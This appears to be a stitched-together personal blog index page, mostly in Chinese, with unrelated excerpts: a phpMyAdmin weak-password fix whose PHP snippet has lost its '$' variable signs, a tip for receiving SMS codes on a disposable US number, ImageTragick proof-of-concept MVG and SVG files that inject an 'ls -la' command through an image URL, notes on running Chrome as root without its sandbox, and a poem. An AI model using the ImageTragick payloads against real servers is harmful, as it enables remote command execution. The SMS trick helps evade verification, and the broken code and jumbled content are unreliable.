漏洞名称:
phpMyadmin弱口令

修复方案:
1.设置强度复杂的口令,可以有效避免被攻击者轻易猜解成功;

2.限制IP访问配置phpMyadmin

您可以使用云服务器提供的安全组防火墙策略对访问源IP地址进行限制,避免不必要的人员访问数据库管理后台。

phpMyadmin默认也提供了访问控制功能,具体配置如下:

进入phpMyAdmin目录,找到config.inc.php,如果没有,可以将根目录下的config.sample.inc.php复制为config.inc.php。

编辑config.inc.php,添加下面两行代码,其中192.168.0.1是允许访问 phpMyAdmin 的IP,Access denied是未经授权访问时的提示信息:

?ip_prefix = '192.168.0.1'; if (substr(_SERVER['REMOTE_ADDR'], 0, strlen(ip_prefix)) != ip_prefix ) die('Access denied');

via: Aliyun tech documents

短信验证什么的最讨厌了。

不过可以试试http://www.pinger.com/tfw/,注册时帐号密码什么的可以随便填,一般都是一次性使用的。

还需要用到美国的邮编,上http://www.gongju5.com/wiki/ny/newyork08/随便复制一个。

注册后会得到一个号码,点右上角的Options可以看到,最前面的1是国家代码,如同中国是86,后面除去括号空格什么的剩下的10位数是电话号码,用这个号码就可以接收短信验证码了。

对中文的支持貌似不佳。

Continue reading

今天安全圈里都在说ImageTragick,看了一下这个漏洞还专门搞出来一个官网,各种建站组件都出了问题,于是第一时间解决了本站的安全威胁。

关于 ImageTragick 漏洞:
https://imagetragick.com/

这个漏洞的生命线:

https://www.seebug.org/appdir/ImageMagick

官网上已经给出了好几种测试方法:

exploit.mvg

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg";|ls "-la)'
pop graphic-context

exploit.svg

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd";>
<svg width="640px" height="480px" version="1.1"
xmlns="http://www.w3.org/2000/svg"; xmlns:xlink=
"http://www.w3.org/1999/xlink";>
<image xlink:href="https://example.com/image.jpg&quot;|ls &quot;-la"
x="0" y="0" height="640px" width="480px"/>
</svg>

Example execution

$ convert exploit.mvg out.png
total 32
drwxr-xr-x 6 user group 204 Apr 29 23:08 .
drwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..

Continue reading

Hello Gays,

Today I will show how to install and run google chrome on Kali Linux V2.0 as root.

Step 1. Download google chrome stable.

Step 2. Install google chrome using ‘dpkg -i’ command. If you get error while installing use ‘apt-get install -f’ command.

Step 3. add –user-data-dir to google-chrome script.

Step 4. run google chrome without sandbox(for some reason most versions of google chrome are not working with sandbox in root).

Step 5. change the arguments in application icon file for easy access.

Step 6. Use it.

Continue reading

曾经走过的路,
长长的香樟树;

曾经聚在一起的人,
杯子碰撞,
孜然味飘荡在后湖的烧烤摊。

—-

这两天疯狂的爱上了渗透测试,这里附上ZoomEye(钟旭之眼)链接:

https://www.zoomeye.org

USA's Northeast Megalopolis

USA’s Northeast Megalopolis